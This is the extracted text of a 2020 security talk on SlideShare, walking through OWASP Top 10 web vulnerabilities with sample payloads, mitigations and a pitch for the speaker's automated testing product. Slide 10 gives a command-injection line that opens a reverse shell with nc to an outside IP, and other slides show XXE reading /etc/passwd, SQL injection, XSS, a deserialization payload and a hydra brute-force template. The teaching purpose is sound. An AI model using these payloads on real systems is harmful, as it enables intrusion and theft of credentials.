Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Hack Me If You Can

151 vues

Publié le

Cloud Native Night, September 2020, talk by Janosch Maier (@Phylu, Co-Founder, Crashtest Security)

== Please download slides if blurred! ==

You are confident, that your web application is secure? No hacker can touch you? Good for you – or not... Only if you know how a hacker thinks, you can really protect yourself. Therefore, in this virtual "escape the room" game, several hacking challenges are waiting for you. By exploiting flaws in a web application, you will see what is possible without much preparation and with a very simple toolset – a modern web browser. Keep this experience in mind, when working on your next application in order to defend yourself against malicious attacks.

About Janosch:
Janosch Maier was only 15 when he created his own tool to record passwords. Ever since then, he questioned publicly available software and began looking for security flaws wherever he could. While living in Uganda, he met Hackers for Charity where he tasted blood on how to hack for the good cause. Since then, Janosch has been on a crusade to enable developers and security experts to cope with the challenges of agile security principles. Especially in modern, agile environments, it is not sufficient anymore to conduct manual, infrequent security tests. As an engaging speaker and Co-Founder of Crashtest Security, his mission is to educate DevOps teams on how to integrate security in their development processes.

Publié dans : Données & analyses
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Hack Me If You Can

  1. 1. | 1 Hack Me If You Can! 30.09.2020 | Crashtest Security GmbH | www.crashtest-security.com
  2. 2. | 2 “SOFTWARE IS EATING THE WORLD” Marc Andreessen, 2011
  3. 3. | 3 WHO IS KEEPING IT SECURE?
  4. 4. | 4 Who is Crashtest Security Cyber Security Experts from Munich | 4 Crashtest Security provides automated penetration testing for web apps and APIs Management Team Me
  5. 5. | 5 Selection of partners & customers that trust us Hassan Moradi, Penetration Test Team Leader - TÜV SÜD Tobias Hadem, Director for IT Infrastructure and Operations - Flixbus
  6. 6. | 6 “Hack me if you can!” https://hacking-challenge.herokuapp.com
  7. 7. | 7 OWASP Top 10 Vulnerability Example
  8. 8. | 8 A1 – SQL Injection ' OR '1' = '1 Mitigation $user = new User; $user->username = $request->username; $user->password = $request->password; $user->email = $request->email; $user->save();
  9. 9. | 9 A1 – SQL Injection $stmt = $mysqli->prepare("INSERT INTO users(username, password, email)VALUES (?, ?, ?)"); $stmt->bind_param("sss", $username,$password, $email $username = $request->username; $password = $request->password; $email = $request->email; $stmt->execute(); if (preg_match("/[^A-Za-z0-9]/", $username) || (preg_match("/[^A-Za-z0-9!_-]/", $password) || (preg_match("/[^A-Za-z0-9_-@]/", $email)) { echo "Invalid Characters!"; } else { # Run Database Command }
  10. 10. | 10 A1 – Command Injection 8.8.8.8; mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 176.28.13.204 1234 1>/tmp/backpipe Mitigation escapeshellarg()
  11. 11. | 11 A2 – Broken Authentication hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS] Mitigation
  12. 12. | 12 A3 – Sensitive Data Exposure Mitigation
  13. 13. | 13 A4 – XML External Entity Processing (XXE) <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE credentials [<!ELEMENT credentials ANY> <!ELEMENT user ANY > <!ENTITY user SYSTEM "file:///etc/passwd">]> <credentials> <user>&user;</user> </credentials> Mitigation libxml_disable_entity_loader();
  14. 14. | 14 A5 – Broken Access Control https://example.com/?user_id=1 Mitigation
  15. 15. | 15 A6 – Security Misconfiguration Mitigation SSLProtocol all -SSLv3 -TLSv1 -TLSv1.1 SSLCipherSuite ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM- SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA- CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256: ECDHE-RSA-AES128-GCM-SHA256 SSLHonorCipherOrder on SSLCompression off
  16. 16. | 16 A7 – Cross-Site-Scripting (XSS) <style> h1 { animation: blink 1s linear infinite; } @keyframes blink { from { opacity: 0; } to { opacity: 1; } } </style> <script>document.getElementsByTagName("h1")[0].innerHTML = "You got Hacked!"</script> Mitigation htmlspecialchars($input)
  17. 17. | 17 A8 – Insecure Deserialization O:9:"TestClass":1:{s:15:"%00TestClass%00hook";s:10:"phpinfo();";} Mitigation
  18. 18. | 18 A9 – Components with known Vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128 /version_id-164957/PHP-PHP-5.5.9.html Mitigation
  19. 19. | 19 A10 – Insufficient Logging & Monitoring Mitigation
  20. 20. | 20 Traditional Security Manual testing with large time intervals SecurityLevel Time Vulnerability Remediation Manual Security Test
  21. 21. | 21 DevSecOps = DevOps + Security DEV OPS
  22. 22. | 22 DevSecOps = DevOps + Security DEV OPS
  23. 23. | 23 DevSecOps & Continuous Security For maximum protection SecurityLevel Time time Vulnerability Remediation Manual Security Test Vulnerability Remediation Manual Security Test SecurityLevel Automated Testing
  24. 24. | 24 What Crashtest Security offers Dynamic Application Security Testing from Germany Scanning for the OWASP Top 10 vulnerabilities Focus on Web Applications & REST APIs Advanced automated testing of JavaScript applications (Deep Scan) Integrated into CI/CD pipeline within 30 minutes Made, hosted and processed in Germany
  25. 25. | 25 How is security handled in your organisation? Contact me now Which role is security playing for you?

×